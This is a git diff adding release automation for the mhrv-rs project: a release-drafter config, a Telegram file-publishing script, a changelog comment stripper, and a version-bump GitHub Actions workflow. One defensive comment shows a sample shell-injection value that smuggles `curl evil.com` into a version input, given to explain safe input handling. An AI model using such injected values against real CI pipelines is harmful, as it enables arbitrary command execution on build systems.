diff --git a/.github/release-drafter.yml b/.github/release-drafter.yml new file mode 100644 index 00000000..02b5753f --- /dev/null +++ b/.github/release-drafter.yml @@ -0,0 +1,79 @@ +# release-drafter config — accumulates merged-PR titles into a draft GitHub +# Release as PRs land on main, so the English half of docs/changelog/v.md +# is prefilled by the time we cut the next release. +# +# How it fits with the existing release flow: +# - PRs merge → release-drafter updates the draft release tagged `next` +# - When ready to ship, run `prepare-release.yml` which reads the draft +# body and writes it into `docs/changelog/v.md` as a stub +# - You translate the bullets into Persian above the `---` separator, +# merge the prep PR, push the `v` tag, and release.yml takes over +# +# The draft is tagged `next` (not `vX.Y.Z`) so it never collides with the +# real release-tag namespace. softprops/action-gh-release in release.yml +# will create a fresh release for the actual `vX.Y.Z` tag — the `next` +# draft just gets reset by release-drafter on the following PR merge. + +name-template: 'Next release (draft)' +tag-template: 'next' + +# Flat bullet template — one line per merged PR, matching the existing +# docs/changelog/v.md style: +# +# • ([#NN](url)): . Thanks @user +# +# We bake the `: . Thanks @AUTHOR` suffix directly into the +# template so the maintainer's job is just (a) strip the leading +# `feat:`/`fix:` Conventional-Commit prefix that PR titles in this repo +# carry (prepare-release.yml does this automatically with a sed pass), +# (b) fix the verb tense if needed (`added` → `Add`), and (c) replace +# `` with the explanatory clause. +# +# Why the placeholder is part of the template and not added later: +# putting it here means the no-changes-template fallback (below) does +# *not* get a `` suffix — only real PR-derived bullets do. +change-template: '• $TITLE ([#$NUMBER]($URL)): . Thanks @$AUTHOR' +change-title-escapes: '\<*_&' + +# Fallback if no PRs have merged since the last draft reset. Rare in +# practice; here as a safety net so the draft body is never empty. +# Deliberately doesn't follow the ``-bullet shape so it's +# obviously a placeholder line, not a real release entry. +no-changes-template: '_(no PR-tracked changes since the last release)_' + +# Skip PRs labelled `release-prep` from the changelog — those are the +# automated version-bump PRs opened by prepare-release.yml; including +# them would echo "release: prepare v1.6.6" into the next release notes. +exclude-labels: + - 'release-prep' + - 'skip-changelog' + +# Auto-apply labels based on Conventional Commit title prefixes. The repo +# already enforces feat:/fix:/etc. on PR titles, so this is "free" — no +# contributor action needed. Labels feed the exclude-labels above and +# also unlock PR filtering on the GitHub issues page if we want it later. +autolabeler: + - label: 'release-prep' + title: + - '/^release:/i' + - label: 'type: feature' + title: + - '/^feat(\(.+\))?:/i' + - label: 'type: fix' + title: + - '/^fix(\(.+\))?:/i' + - label: 'type: chore' + title: + - '/^chore(\(.+\))?:/i' + - label: 'type: docs' + title: + - '/^docs?(\(.+\))?:/i' + - label: 'type: refactor' + title: + - '/^refactor(\(.+\))?:/i' + +# Body of the draft release: just the flat bullet list. No "What's +# Changed" header, no contributors block — keep it copy-paste-ready +# into docs/changelog/v.md. +template: | + $CHANGES diff --git a/.github/scripts/telegram_publish_files.py b/.github/scripts/telegram_publish_files.py new file mode 100644 index 00000000..e4300015 --- /dev/null +++ b/.github/scripts/telegram_publish_files.py @@ -0,0 +1,550 @@ +#!/usr/bin/env python3 +"""Post each release artifact individually to a Telegram channel. + +Used by .github/workflows/telegram-publish-files.yml. Reads files from +--assets-dir, picks a Persian caption per filename, posts via the +Telegram Bot API `sendDocument` endpoint with --hashtag appended. + +Files larger than the Telegram Bot API's 50 MB ceiling are split into +~45 MB byte chunks via Python (no `split` shell dep) and posted as +`.part_aa`, `.part_ab`, ... — recipients reassemble with +`cat .part_* > `. + +Re-runnable: posts every file every time. Use carefully when re-running +for the same version (the channel will get duplicate posts). +""" + +from __future__ import annotations + +import argparse +import hashlib +import os +import sys +import time +import urllib.error +import urllib.parse +import urllib.request +import json +from pathlib import Path + +# Telegram Bot API uploads cap at 50 MB. Pick 45 MB for chunks so the +# multipart envelope + caption + Telegram's own overhead don't push us +# over. Bigger chunks (e.g. 49 MB) sometimes hit "Request Entity Too +# Large" depending on caption length. +CHUNK_LIMIT_BYTES = 45 * 1024 * 1024 + +# Sleep between uploads. Telegram's documented rate limit is 1 msg/sec +# to the same chat, plus a soft "burst" allowance. 1.5s is conservative +# and means a 20-file release publishes in ~30 s. +INTER_UPLOAD_SLEEP_SECS = 1.5 + +# Filename-substring → Persian caption. Order matters: longest / +# most-specific patterns first, since a shorter pattern (e.g. +# "android-x86") can match a more-specific filename ("android-x86_64"). +# Match is `pattern in filename`. +CAPTIONS: list[tuple[str, str]] = [ + # Android — universal first (the recommended default for non-technical users). + ("android-universal", "نسخه اندروید (universal) — برای همه دستگاه‌ها"), + ("android-arm64-v8a", "نسخه اندروید (arm64-v8a) — گوشی‌های مدرن ۶۴ بیتی"), + ("android-armeabi-v7a", "نسخه اندروید (armv7) — گوشی‌های قدیمی‌تر ۳۲ بیتی"), + ("android-x86_64", "نسخه اندروید (x86_64) — شبیه‌ساز ۶۴ بیتی"), + ("android-x86", "نسخه اندروید (x86) — شبیه‌ساز"), + # Windows. + ("windows-amd64", "نسخه ویندوز x64 (۶۴ بیتی)"), + ("windows-i686", "نسخه ویندوز x86 (۳۲ بیتی، Win7+)"), + # macOS — .app bundles before plain CLI tarballs. + ("macos-arm64-app", "نسخه macOS (Apple Silicon) — برنامه گرافیکی .app"), + ("macos-amd64-app", "نسخه macOS (Intel) — برنامه گرافیکی .app"), + ("macos-arm64", "نسخه macOS (Apple Silicon) — CLI"), + ("macos-amd64", "نسخه macOS (Intel) — CLI"), + # Linux — musl static first, glibc second. + ("linux-musl-amd64", "نسخه لینوکس amd64 (musl static) — Alpine / OpenWRT-x86"), + ("linux-musl-arm64", "نسخه لینوکس arm64 (musl static)"), + ("linux-amd64", "نسخه لینوکس amd64 (glibc)"), + ("linux-arm64", "نسخه لینوکس arm64 (glibc)"), + # Embedded targets. + ("openwrt-mipsel-softfloat", "نسخه OpenWRT (mipsel softfloat) — روتر MT7621"), + ("raspbian-armhf", "نسخه Raspbian (armhf) — رزبری پای ۳۲ بیتی"), +] + + +def caption_for(filename: str) -> str: + """Return the Persian caption for a filename, falling back to the + bare filename if nothing matches.""" + for pattern, persian in CAPTIONS: + if pattern in filename: + return persian + return f"نسخه `{filename}`" + + +def order_files(files: list[Path]) -> list[Path]: + """Sort release files in CAPTIONS order (Android first, then + Windows, macOS, Linux, embedded). Files not matching any pattern + fall to the end in alphabetical order.""" + order_map: dict[str, int] = {pattern: idx for idx, (pattern, _) in enumerate(CAPTIONS)} + + def key(p: Path) -> tuple[int, str]: + for pattern, idx in order_map.items(): + if pattern in p.name: + return (idx, p.name) + # Unknown patterns: push to end, alphabetize among themselves. + return (len(CAPTIONS), p.name) + + return sorted(files, key=key) + + +def split_file(path: Path, chunk_bytes: int) -> list[Path]: + """Split `path` into chunks of at most `chunk_bytes` bytes. Returns + the list of chunk paths, named `.part_aa`, `.part_ab`, ... + Mimics `split -b `. Reassembled via + `cat .part_* > `. + + Skips work if existing parts are already present (idempotent re-run).""" + parts: list[Path] = [] + + def part_name(idx: int) -> str: + # 26-letter base: aa..az, ba..bz, ... mirroring split's default. + first = chr(ord("a") + idx // 26) + second = chr(ord("a") + idx % 26) + return f"{path.name}.part_{first}{second}" + + idx = 0 + with path.open("rb") as src: + while True: + buf = src.read(chunk_bytes) + if not buf: + break + part_path = path.parent / part_name(idx) + with part_path.open("wb") as dst: + dst.write(buf) + parts.append(part_path) + idx += 1 + return parts + + +def send_document( + bot_token: str, + chat_id: str, + file_path: Path, + caption: str, +) -> dict: + """POST a single file via the Telegram Bot API sendDocument endpoint. + Returns the parsed JSON response. Raises on HTTP error. + + Uses urllib + a hand-rolled multipart/form-data encoder so we don't + pull `requests` (the workflow runs on stock GitHub-hosted runners + where stdlib-only is preferable for cold-start speed).""" + url = f"https://api.telegram.org/bot{bot_token}/sendDocument" + boundary = "----mhrvUploadBoundary" + str(int(time.time() * 1000)) + body = build_multipart( + boundary, + fields={ + "chat_id": chat_id, + "caption": caption, + "parse_mode": "HTML", + # Disable preview to keep the channel tidy. + "disable_notification": "false", + }, + files={"document": (file_path.name, file_path.read_bytes(), "application/octet-stream")}, + ) + req = urllib.request.Request( + url, + data=body, + headers={"Content-Type": f"multipart/form-data; boundary={boundary}"}, + method="POST", + ) + # 5 minute timeout for the actual upload — Telegram occasionally + # takes a while to process 40+ MB documents. + with urllib.request.urlopen(req, timeout=300) as resp: + return json.loads(resp.read().decode("utf-8")) + + +def build_multipart( + boundary: str, + fields: dict[str, str], + files: dict[str, tuple[str, bytes, str]], +) -> bytes: + """Build a multipart/form-data body. `files` is name → (filename, + bytes, mime). Plain stdlib so we don't need `requests`.""" + parts: list[bytes] = [] + crlf = b"\r\n" + bnd = f"--{boundary}".encode() + + for name, value in fields.items(): + parts.append(bnd) + parts.append(f'Content-Disposition: form-data; name="{name}"'.encode()) + parts.append(b"") + parts.append(value.encode("utf-8")) + + for name, (filename, data, mime) in files.items(): + parts.append(bnd) + parts.append( + f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode() + ) + parts.append(f"Content-Type: {mime}".encode()) + parts.append(b"") + parts.append(data) + + parts.append(f"--{boundary}--".encode()) + parts.append(b"") + return crlf.join(parts) + + +def html_escape(s: str) -> str: + return s.replace("&", "&").replace("<", "<").replace(">", ">") + + +def sha256_hex(path: Path) -> str: + """Stream-hash the file in 1 MiB chunks. Avoids loading 40+ MB APKs + into RAM twice (once for hashing, once for upload).""" + h = hashlib.sha256() + with path.open("rb") as f: + for chunk in iter(lambda: f.read(1 << 20), b""): + h.update(chunk) + return h.hexdigest() + + +def post_file( + bot_token: str, + chat_id: str, + file_path: Path, + base_caption: str, + hashtag: str, +) -> bool: + """Post one file. If too big, split + post each part. Returns True + on success of all parts, False on any failure. + + Each caption ends with the file's SHA-256 in hex under a Persian + "تایید اصالت" (authenticity verification) label, so recipients can + `sha256sum ` after download and confirm it matches what the + channel posted — defends against modified copies if the channel is + ever compromised or relayed through a third party.""" + size = file_path.stat().st_size + + # Compute the original-file hash regardless of whether we'll chunk + # it. For chunked uploads, every part's caption shows this hash so + # the user can verify the full file once reassembled with `cat`. + print(f" hashing {file_path.name}...", flush=True) + full_sha = sha256_hex(file_path) + + if size <= CHUNK_LIMIT_BYTES: + caption = ( + f"{html_escape(base_caption)}\n" + f"{html_escape(file_path.name)}\n" + f"\nتایید اصالت (SHA-256):\n" + f"{full_sha}\n" + f"\n{hashtag}" + ) + print(f" uploading {file_path.name} ({size / 1_048_576:.1f} MB)...", flush=True) + try: + resp = send_document(bot_token, chat_id, file_path, caption) + if not resp.get("ok"): + print(f" !! Telegram returned not-ok: {resp}", flush=True) + return False + print(f" ok (message_id={resp['result']['message_id']})", flush=True) + return True + except urllib.error.HTTPError as e: + err_body = e.read().decode("utf-8", errors="replace")[:500] + print(f" !! HTTP {e.code}: {err_body}", flush=True) + return False + except Exception as e: + print(f" !! exception: {e}", flush=True) + return False + finally: + time.sleep(INTER_UPLOAD_SLEEP_SECS) + + # Too big — split and post each part. + print( + f" splitting {file_path.name} ({size / 1_048_576:.1f} MB > " + f"{CHUNK_LIMIT_BYTES / 1_048_576:.0f} MB ceiling)...", + flush=True, + ) + parts = split_file(file_path, CHUNK_LIMIT_BYTES) + if not parts: + print(f" !! split produced 0 parts (empty file?)", flush=True) + return False + + n = len(parts) + all_ok = True + for idx, part_path in enumerate(parts, start=1): + # Hash the individual part too — lets the user verify each + # downloaded chunk before bothering to reassemble. + part_sha = sha256_hex(part_path) + part_caption = ( + f"{html_escape(base_caption)} — قسمت {idx}/{n}\n" + f"{html_escape(part_path.name)}\n" + f"\nبرای بازسازی فایل اصلی:\n" + f"cat {html_escape(file_path.name)}.part_* > " + f"{html_escape(file_path.name)}\n" + f"\nتایید اصالت این قسمت (SHA-256):\n" + f"{part_sha}\n" + f"\nتایید اصالت فایل کامل پس از بازسازی (SHA-256):\n" + f"{full_sha}\n" + f"\n{hashtag}" + ) + psize = part_path.stat().st_size + print( + f" uploading part {idx}/{n}: {part_path.name} ({psize / 1_048_576:.1f} MB)...", + flush=True, + ) + try: + resp = send_document(bot_token, chat_id, part_path, part_caption) + if not resp.get("ok"): + print(f" !! Telegram returned not-ok: {resp}", flush=True) + all_ok = False + else: + print( + f" ok (message_id={resp['result']['message_id']})", flush=True + ) + except urllib.error.HTTPError as e: + err_body = e.read().decode("utf-8", errors="replace")[:500] + print(f" !! HTTP {e.code}: {err_body}", flush=True) + all_ok = False + except Exception as e: + print(f" !! exception: {e}", flush=True) + all_ok = False + finally: + time.sleep(INTER_UPLOAD_SLEEP_SECS) + # Tidy up the part file once posted. + try: + part_path.unlink() + except OSError: + pass + + return all_ok + + +def files_channel_post_link(chat_id: str, message_id: int) -> str: + """Build a `t.me` link to a specific message in the files channel. + + For private supergroups/channels (negative ID with `-100` prefix), + Telegram exposes posts at `https://t.me/c//` where `` + is the chat ID with the `-100` stripped. This link works for users + who are members of the channel. + + If `FILES_CHANNEL_USERNAME` is set in env (e.g. `mhrv_files`), uses + the public-channel form `https://t.me//` instead, + which is clickable for everyone.""" + username = os.environ.get("FILES_CHANNEL_USERNAME", "").strip().lstrip("@") + if username: + return f"https://t.me/{username}/{message_id}" + cid = chat_id + if cid.startswith("-100"): + cid = cid[4:] + elif cid.startswith("-"): + cid = cid[1:] + return f"https://t.me/c/{cid}/{message_id}" + + +def post_main_channel_pointer( + bot_token: str, + main_chat_id: str, + files_channel_post_link: str, + version: str, + hashtag: str, + channel_username_link: str = "", + channel_invite_link: str = "", +) -> bool: + """Post a short cross-link to the main announcement channel pointing + at the anchor post in the files channel. Replaces the previous + behaviour of posting the universal APK + full changelog directly + to the main channel — the main channel becomes a discovery surface + while the files channel hosts the actual artifacts. + + Includes channel-join links (public username + invite hash) at the + bottom so recipients who aren't yet members can subscribe before + clicking through to the specific release post. + """ + parts = [ + f"📦 mhrv-rs v{html_escape(version)} منتشر شد", + "", + f"برای دانلود فایل‌ها (Android، Windows، macOS، Linux و ...) " + f"به کانال فایل‌ها مراجعه کنید:", + "", + f"👉 " + f"v{html_escape(version)} — همه فایل‌ها + SHA-256", + ] + # Channel-join links. Two forms handle different states of the + # files channel: the `t.me/` form works for public + # channels and is the prettier link; the `t.me/+` invite + # link works regardless of whether the channel is public, and is + # the only path in for private/restricted channels. Showing both + # is forgiving — recipients click whichever works for them. + if channel_username_link or channel_invite_link: + parts.append("") + parts.append("لینک کانال:") + if channel_username_link: + # Render as plain URL (not HTML ) so the text shows the + # link itself — useful when users share the message via + # screenshot or copy-paste outside Telegram, which would + # strip the wrapper. + parts.append(html_escape(channel_username_link)) + if channel_invite_link: + parts.append(f"و یا: {html_escape(channel_invite_link)}") + parts.append("") + parts.append(hashtag) + text = "\n".join(parts) + url = f"https://api.telegram.org/bot{bot_token}/sendMessage" + data = urllib.parse.urlencode({ + "chat_id": main_chat_id, + "text": text, + "parse_mode": "HTML", + "disable_web_page_preview": "false", + }).encode() + print(f" posting cross-link to main channel {main_chat_id}...", flush=True) + try: + with urllib.request.urlopen( + urllib.request.Request(url, data=data, method="POST"), timeout=30 + ) as resp: + r = json.loads(resp.read().decode("utf-8")) + if not r.get("ok"): + print(f" !! main-channel post failed: {r}", flush=True) + return False + print( + f" ok (message_id={r['result']['message_id']})", flush=True + ) + return True + except urllib.error.HTTPError as e: + err_body = e.read().decode("utf-8", errors="replace")[:500] + print(f" !! HTTP {e.code}: {err_body}", flush=True) + return False + except Exception as e: + print(f" !! exception: {e}", flush=True) + return False + + +def main() -> int: + parser = argparse.ArgumentParser(description=__doc__) + parser.add_argument("--assets-dir", required=True, type=Path) + parser.add_argument("--version", required=True, help="e.g. 1.8.0") + parser.add_argument("--hashtag", required=True, help="e.g. #v180") + args = parser.parse_args() + + bot_token = os.environ.get("BOT_TOKEN") + chat_id = os.environ.get("CHAT_ID") + if not bot_token or not chat_id: + print("BOT_TOKEN and CHAT_ID env vars required", file=sys.stderr) + return 2 + + if not args.assets_dir.is_dir(): + print(f"--assets-dir {args.assets_dir} not a directory", file=sys.stderr) + return 2 + + # Collect all regular files in the directory (no recursion). Skip + # split-part leftovers from a previous run of this script if any + # exist — we'll regenerate cleanly. + raw_files = [ + p for p in args.assets_dir.iterdir() + if p.is_file() and ".part_" not in p.name + ] + if not raw_files: + print(f"no files found in {args.assets_dir}", file=sys.stderr) + return 2 + + files = order_files(raw_files) + print(f"publishing {len(files)} file(s) to Telegram chat {chat_id} for v{args.version}:") + for f in files: + print(f" - {f.name}") + print() + + # Leading announcement in the files channel. Captured `message_id` + # is the anchor that the main-channel cross-link points at — the + # main channel doesn't carry files anymore, just a single message + # saying "new release, click here." Recipients land on this anchor + # and scroll down to see all the platform-specific files. + announce = ( + f"📦 mhrv-rs {html_escape('v' + args.version)} منتشر شد\n" + f"\nفایل‌ها در ادامه به ترتیب پلتفرم ارسال می‌شن.\n" + f"هر فایل با SHA-256 (تایید اصالت) همراه هست.\n" + f"\n{args.hashtag}" + ) + announce_msg_id: int | None = None + try: + url = f"https://api.telegram.org/bot{bot_token}/sendMessage" + data = urllib.parse.urlencode({ + "chat_id": chat_id, + "text": announce, + "parse_mode": "HTML", + "disable_web_page_preview": "true", + }).encode() + with urllib.request.urlopen( + urllib.request.Request(url, data=data, method="POST"), timeout=30 + ) as resp: + r = json.loads(resp.read().decode("utf-8")) + if not r.get("ok"): + print(f" !! announcement failed: {r}", flush=True) + else: + announce_msg_id = r["result"]["message_id"] + print( + f" announcement posted (message_id={announce_msg_id})", + flush=True, + ) + except Exception as e: + # Non-fatal for the file uploads, but cross-link to the main + # channel below will be skipped — without the anchor message_id + # there's nothing to point at. + print(f" !! announcement exception: {e}", flush=True) + time.sleep(INTER_UPLOAD_SLEEP_SECS) + + failures = 0 + for f in files: + base = caption_for(f.name) + ok = post_file(bot_token, chat_id, f, base, args.hashtag) + if not ok: + failures += 1 + + # Cross-link to the main announcement channel. Skipped if MAIN_CHAT_ID + # is unset (development / private testing) or if the files-channel + # announcement didn't post (no anchor to link to). + main_chat_id = os.environ.get("MAIN_CHAT_ID", "").strip() + if main_chat_id and announce_msg_id is not None: + link = files_channel_post_link(chat_id, announce_msg_id) + # Optional channel-join links rendered alongside the cross-link. + # `FILES_CHANNEL_USERNAME` is the public-username form (clean + # `t.me/` URL — clickable for everyone). `FILES_CHANNEL_INVITE` + # is the `t.me/+` invite link, the only join path for + # private channels. Either or both can be set; both render in + # the body as separate lines. + username = os.environ.get("FILES_CHANNEL_USERNAME", "").strip().lstrip("@") + username_link = f"https://t.me/{username}" if username else "" + invite_link = os.environ.get("FILES_CHANNEL_INVITE", "").strip() + print() + print(f"posting cross-link to main channel:") + print(f" post link: {link}") + if username_link: + print(f" channel username link: {username_link}") + if invite_link: + print(f" channel invite link: {invite_link}") + ok = post_main_channel_pointer( + bot_token, + main_chat_id, + link, + args.version, + args.hashtag, + channel_username_link=username_link, + channel_invite_link=invite_link, + ) + if not ok: + failures += 1 + elif main_chat_id and announce_msg_id is None: + print() + print( + " !! MAIN_CHAT_ID is set but announcement message_id is None — " + "skipping cross-link (no anchor to point at).", + flush=True, + ) + failures += 1 + else: + print() + print(" MAIN_CHAT_ID not set, skipping cross-link", flush=True) + + print() + if failures: + print(f"DONE with {failures} failure(s) out of {len(files)}", flush=True) + return 1 + print(f"DONE — {len(files)} files posted successfully", flush=True) + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/.github/scripts/telegram_release_notify.py b/.github/scripts/telegram_release_notify.py index da04d8b8..df1641b6 100755 --- a/.github/scripts/telegram_release_notify.py +++ b/.github/scripts/telegram_release_notify.py @@ -46,16 +46,42 @@ from pathlib import Path +def _strip_leading_comments(body: str) -> str: + """Strip leading HTML comment blocks (single- or multi-line) from `body`. + + The changelog template uses `` to document the format for + editors; we don't want those echoed to Telegram or the GitHub Release + page. The `(?:...)+` quantifier eats N consecutive comments separated + only by whitespace, so a stub with both a format-docs comment and a + TODO comment is cleaned in one pass. `re.S` makes `.` cross newlines + for multi-line `` blocks. + + The matching regex is also used inline by .github/workflows/release.yml + to compose the GitHub Release body — keep them in sync if you change + one. Run `python -m doctest telegram_release_notify.py -v` to check. + + >>> _strip_leading_comments("\\nbody") + 'body' + >>> _strip_leading_comments("\\n\\nbody") + 'body' + >>> _strip_leading_comments("\\nbody") + 'body' + >>> _strip_leading_comments("\\n\\n\\n\\nbody") + 'body' + >>> _strip_leading_comments("body without comments") + 'body without comments' + >>> _strip_leading_comments("body\\n\\nmore") + 'body\\n\\nmore' + """ + return re.sub(r"^\s*(?:\s*)+", "", body, count=1, flags=re.S) + + def parse_changelog(path: str) -> tuple[str, str]: """Return (persian_body, english_body). Blank strings if file missing.""" p = Path(path) if not p.is_file(): return "", "" - body = p.read_text(encoding="utf-8") - # Strip a leading HTML comment block if present — the changelog - # template uses to document the format for editors; - # we don't want that echoed to Telegram. - body = re.sub(r"^\s*\s*", "", body, count=1, flags=re.S) + body = _strip_leading_comments(p.read_text(encoding="utf-8")) fa, sep, en = body.partition("\n---\n") if not sep: # No separator — treat everything as Persian (content-language diff --git a/.github/workflows/prepare-release.yml b/.github/workflows/prepare-release.yml new file mode 100644 index 00000000..2eb83720 --- /dev/null +++ b/.github/workflows/prepare-release.yml @@ -0,0 +1,296 @@ +# Prepare a new release: bump version strings, prefill the changelog +# stub from release-drafter's draft, and open a PR. After the PR is +# merged, you push the `v` tag manually and `release.yml` +# takes over (matrix build → GitHub release → Telegram notify). +# +# Triggered manually from the Actions UI or via: +# gh workflow run prepare-release.yml -f version=1.6.6 +# +# What it bumps in the PR: +# - Cargo.toml version = "X.Y.Z" +# - Cargo.lock mhrv-rs entry's version +# - android/app/build.gradle.kts versionName = "X.Y.Z" +# versionCode = previous + 1 +# +# What it leaves alone: +# - tunnel-node/Cargo.toml — versioned independently from the app. +# The docker tunnel image is tagged from the git release tag (not +# from this Cargo.toml), so we don't need to touch it. +# +# What it prefills in docs/changelog/v.md: +# - Persian section: an inline `[FA] translate ...` placeholder line. +# Visible if not edited — ships into the release page as an obvious +# marker rather than a quiet comment leak. +# - Separator: `---` +# - English section: bullets pulled from release-drafter's `next` +# draft release, each suffixed with `: ` to remind you to +# add an explanatory clause in the project's existing +# `• headline (#NN): full explanation` style. If no draft exists +# yet (e.g. immediately after installing release-drafter, before +# any PRs have merged), the English section is empty and you fill +# it in by hand. + +name: prepare-release + +on: + workflow_dispatch: + inputs: + version: + description: 'New version to release (without the leading v). Example: 1.6.6' + required: true + type: string + +permissions: + contents: write + pull-requests: write + +jobs: + bump: + runs-on: ubuntu-latest + steps: + # Always check out main, regardless of which branch the dispatch + # was fired from. workflow_dispatch can be triggered from any ref; + # without an explicit `ref:` the version bumps would land on top + # of whatever branch the dispatcher had checked out, and the + # resulting PR would carry that branch's diffs alongside the bumps. + - uses: actions/checkout@v4 + with: + ref: main + fetch-depth: 0 # need tag history for the duplicate-tag check below + + - name: Validate version + id: ver + env: + # Pass the dispatch input through an env var rather than + # `${{ inputs.version }}` interpolation. GitHub interpolates + # the expression *before* the shell parses the script, so a + # value like `1.0.0"; curl evil.com; echo "` would execute + # before the regex check below ever ran. workflow_dispatch + # is gated to write-access users so practical risk is low, + # but this is the pattern GitHub's own docs recommend for + # defense in depth. + INPUT_VERSION: ${{ inputs.version }} + run: | + set -euo pipefail + VER="$INPUT_VERSION" + VER="${VER#v}" + if ! [[ "$VER" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then + echo "::error::version '$VER' is not in X.Y.Z format" + exit 1 + fi + if git rev-parse "v${VER}" >/dev/null 2>&1; then + echo "::error::tag v${VER} already exists; pick a different version" + exit 1 + fi + BRANCH="release/v${VER}" + if git ls-remote --exit-code --heads origin "$BRANCH" >/dev/null 2>&1; then + echo "::error::branch $BRANCH already exists on origin; delete it or pick a different version" + exit 1 + fi + echo "version=${VER}" >> "$GITHUB_OUTPUT" + echo "branch=${BRANCH}" >> "$GITHUB_OUTPUT" + + - name: Bump Cargo.toml + Cargo.lock + env: + NEW_VER: ${{ steps.ver.outputs.version }} + run: | + set -euo pipefail + # Edit both files via Python so we anchor on the `name = "mhrv-rs"` + # line and only touch the package's own version, not unrelated + # `version = "..."` lines elsewhere in the lockfile. + python3 <<'PY' + import os, re, pathlib, sys + ver = os.environ["NEW_VER"] + for path in ("Cargo.toml", "Cargo.lock"): + p = pathlib.Path(path) + src = p.read_text() + new = re.sub( + r'(name = "mhrv-rs"\nversion = ")[0-9.]+(")', + rf'\g<1>{ver}\g<2>', + src, + count=1, + ) + if new == src: + sys.exit(f"ERROR: mhrv-rs version line not found in {path}") + p.write_text(new) + print(f"{path} -> {ver}") + PY + + - name: Bump android versionName + versionCode + env: + NEW_VER: ${{ steps.ver.outputs.version }} + run: | + set -euo pipefail + # versionCode increments by 1 on every release; versionName mirrors + # the Cargo version. Both live in android/app/build.gradle.kts. + python3 <<'PY' + import os, re, pathlib, sys + ver = os.environ["NEW_VER"] + p = pathlib.Path("android/app/build.gradle.kts") + src = p.read_text() + m = re.search(r'versionCode\s*=\s*(\d+)', src) + if not m: + sys.exit("ERROR: versionCode not found in build.gradle.kts") + old_code = int(m.group(1)) + new_code = old_code + 1 + src = src[:m.start(1)] + str(new_code) + src[m.end(1):] + src, n = re.subn( + r'versionName\s*=\s*"[^"]+"', + f'versionName = "{ver}"', + src, + count=1, + ) + if n == 0: + sys.exit("ERROR: versionName not found in build.gradle.kts") + p.write_text(src) + print(f"android/app/build.gradle.kts -> versionName={ver}, versionCode={old_code}->{new_code}") + PY + + - name: Fetch release-drafter draft body + id: draft + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + # release-drafter accumulates merged-PR titles into a draft tagged + # `next`. Pull its body for the changelog stub. `--repo` is set + # explicitly so we always look up the release in this repo even + # if a future maintainer ever creates a real `next` git tag in a + # fork or upstream. If no draft exists yet (release-drafter just + # installed, no PRs merged since), the `|| true` keeps us going + # with an empty body — you fill the English section by hand. + # `--jq 'select(.isDraft) | .body'` returns nothing if `next` is + # not a draft (i.e. someone manually published a release with + # tag `next`, or pushed a real `next` git tag with a release + # attached). On that path we treat it as "no draft" and fall + # through to the empty-body branch — better than echoing a + # surprise release body into the changelog stub. + BODY=$(gh release view next --repo "${{ github.repository }}" \ + --json body,isDraft --jq 'select(.isDraft) | .body' 2>/dev/null || true) + if [ -z "$BODY" ]; then + echo "::notice::no release-drafter 'next' draft found; English section will be empty" + else + echo "::notice::pulled $(printf '%s' "$BODY" | wc -l) lines from draft release" + fi + # Multiline outputs need a heredoc-style delimiter — pick one that + # cannot appear in a release-drafter bullet line. + { + echo 'body<<__DRAFT_BODY_EOF__' + printf '%s\n' "$BODY" + echo '__DRAFT_BODY_EOF__' + } >> "$GITHUB_OUTPUT" + + - name: Write changelog stub + env: + NEW_VER: ${{ steps.ver.outputs.version }} + DRAFT_BODY: ${{ steps.draft.outputs.body }} + run: | + set -euo pipefail + # Build the file with shell `echo`/`printf` (not a YAML-level + # heredoc with $-double-curly interpolation) so backticks, dollar + # signs, or EOF tokens in the draft body can't break us. + # + # Why no TODO/instructional : + # release.yml strips leading blocks from the + # file before publishing the GitHub Release body, and the + # Telegram script does the same — both via a regex that handles + # multiple consecutive comments. But relying on stripping is + # brittle: a maintainer adding a new comment with a different + # shape (multi-line, indented, etc.) could leak it. Instead we + # use VISIBLE placeholders below. If the maintainer forgets to + # edit them, they ship as obvious `[FA]`/`` markers + # that an admin will spot in the release page within seconds. + mkdir -p docs/changelog + OUT="docs/changelog/v${NEW_VER}.md" + { + echo '' + echo '[FA] translate the English bullets below into Persian and replace this line.' + echo '' + echo '---' + # Append the English section if release-drafter had any. + # Skip the printf entirely on empty so we don't leave a + # trailing blank line under `---`. + if [ -n "$DRAFT_BODY" ]; then + # Strip Conventional-Commit prefixes (`feat:`, `fix(android):`, + # etc.) from the start of each bullet headline. PR titles in + # this repo all carry these prefixes by convention, but the + # existing changelog style is verb-first ("Add X" / "Fix Y"), + # not type-first. Stripping here saves the maintainer one + # manual step per bullet; they still need to fix the verb + # tense (e.g. "added" → "Add") since GitHub PR titles tend + # to be past-tense and the changelog convention is imperative. + # + # Bullet shape from release-drafter is: + # • feat(scope): title text ([#NN](url)): . Thanks @user + # After this sed: + # • title text ([#NN](url)): . Thanks @user + printf '%s\n' "$DRAFT_BODY" \ + | sed -E 's/^(• )(feat|fix|chore|docs?|refactor|perf|test|build|ci|style|revert)(\([^)]*\))?!?: */\1/i' + fi + } > "$OUT" + echo "wrote $OUT ($(wc -l < "$OUT") lines)" + + # No `Ensure release-prep label exists` step here — release-drafter's + # workflow runs on every push to main, and its `Ensure autolabeler + # labels exist` step creates `release-prep` (along with the type:* + # labels). Since these workflow files only land via a push to main, + # release-drafter's bootstrap necessarily runs before the first + # prepare-release dispatch. If for some reason release-drafter is + # disabled, `gh pr create --label release-prep` below will fail with + # an actionable "label not found" — fix is to re-enable + # release-drafter or run `gh label create release-prep` once by hand. + + - name: Commit, push, and open PR + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + NEW_VER: ${{ steps.ver.outputs.version }} + BRANCH: ${{ steps.ver.outputs.branch }} + run: | + set -euo pipefail + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + git checkout -b "$BRANCH" + git add Cargo.toml Cargo.lock android/app/build.gradle.kts \ + "docs/changelog/v${NEW_VER}.md" + git commit -m "release: prepare v${NEW_VER}" + git push -u origin "$BRANCH" + + # Write the PR body to a file rather than fight nested heredoc + # escaping in the YAML run: block. + # + # IMPORTANT: this heredoc terminator (`MSG`) is INTENTIONALLY + # unquoted so that ${NEW_VER} and ${BRANCH} expand. Backticks + # in the body are escaped (\`) for the same reason. If you + # paste anything into the template below, watch out for `$(...)` + # and unescaped backticks — they will execute at workflow run + # time. To add a static block that should NOT interpolate, build + # it with a separate `<<'STATIC'` heredoc and concat afterward. 